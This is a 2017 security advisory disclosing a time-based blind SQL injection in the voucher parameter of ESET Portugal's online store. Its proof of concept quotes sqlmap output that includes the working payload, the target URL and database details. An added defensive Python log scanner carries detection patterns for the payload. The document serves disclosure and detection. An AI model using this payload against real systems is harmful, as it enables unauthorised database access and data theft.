
2017-006: SQL injection found in the Portuguese ESET ecommerce


Original release date: July 25, 2017
Last revised: July 25, 2017
Severity: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)

BACKGROUND

ESET is an IT security company that offers anti-virus and firewall products such as ESET NOD32.

DESCRIPTION

A SQL injection attack consists of the insertion or "injection" of a SQL query via the input data sent from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administrative operations on the database (such as shutting down the DBMS), recover the content of a given file present on the DBMS file system and, in some cases, issue commands to the operating system. SQL injection attacks are a type of injection attack in which SQL commands are injected into data-plane input in order to alter the execution of predefined SQL commands.

PROOF OF CONCEPT

-------------------------
Vulnerable URL:     https://loja.eset.pt/index.php
Vulnerable parameter:     voucherid

Identified following injection points:

---
Parameter: voucherid (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: voucherid=BLACKFRIDAY' AND SLEEP(5)-- QqCn
---
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
banner:    '9/9/9X'
sqlmap resumed the following injection point(s) from stored session:

---
Parameter: voucherid (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: voucherid=BLACKFRIDAY' AND SLEEP(5)-- QqCn
---
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
banner:    '9/9/9X'
current user:    'mcatarino@%'
current database:    'eset_vouchers'
hostname:    'extra'
current user is DBA:    True
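As an added, defender-side example (not part of the original advisory): a small Python scanner that reads Apache access-log lines, decodes the query string and flags the time-based blind pattern shown in the proof of concept above, as well as sqlmap's User-Agent. The log lines, client addresses and User-Agent strings are constructed for this example, and the log format assumed is Apache's "combined" format.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache "combined" log lines (not real traffic from loja.eset.pt).
# Line 1 carries the advisory's voucherid payload, percent-encoded as a client
# would send it; lines 2 and 3 are benign voucher lookups.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Jul/2017:10:15:02 +0100] "GET /index.php?voucherid=BLACKFRIDAY%27%20AND%20SLEEP%285%29--%20QqCn HTTP/1.1" 200 512 "-" "sqlmap/1.1"
198.51.100.4 - - [25/Jul/2017:10:15:03 +0100] "GET /index.php?voucherid=BLACKFRIDAY HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.9 - - [25/Jul/2017:10:15:05 +0100] "GET /index.php?voucherid=SUMMER%20SALE HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# MySQL time-based blind primitives (SLEEP is the one in the PoC); case-insensitive
# and tolerant of whitespace before the parenthesis.
TIME_BASED_RE = re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.IGNORECASE)
# A quote followed later by a "-- " comment tail, the PoC payload's other tell.
COMMENT_TAIL_RE = re.compile(r"'.*--\s", re.DOTALL)

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not fit."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def suspicious_params(target):
    """Query parameter -> decoded value, for parameters matching a signature.
    Decoding happens before matching so percent-encoded payloads are caught."""
    hits = {}
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if TIME_BASED_RE.search(value) or COMMENT_TAIL_RE.search(value):
            hits[name] = value
    return hits

def scan(log_text):
    """One alert per line with a matching payload or a sqlmap User-Agent."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        params = suspicious_params(rec["target"])
        sqlmap_ua = rec["ua"].lower().startswith("sqlmap")
        if params or sqlmap_ua:
            alerts.append({"ip": rec["ip"], "ts": rec["ts"], "status": rec["status"],
                           "params": params, "sqlmap_ua": sqlmap_ua})
    return alerts
```

Running `scan(SAMPLE_LOG)` yields a single alert for the first line; correlating such hits with unusually long response times (Apache's `%D` field, if logged) separates a real blind-injection probe from a voucher code that merely contains the substring.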

BUSINESS IMPACT

SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.

SYSTEMS AFFECTED

SOLUTION

Contact vendor for a fix.

REVISION HISTORY

July 25, 2017 : Initial release

DISCLOSURE TIMELINE

  • July 25, 2017 : Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
  • July 25, 2017 : Contact with ESET Security Team.

REFERENCES

Consult these external references for further information:

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a company based in Spain and Colombia and a leader in web application testing, network security, penetration testing, and security compliance implementation and assessment. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are a vendor-independent provider with deep expertise since 2001. Our R&D efforts include vulnerability research, collaboration on open security projects, whitepapers, presentations, and participation in and promotion of security events. For further information regarding our security services, contact us.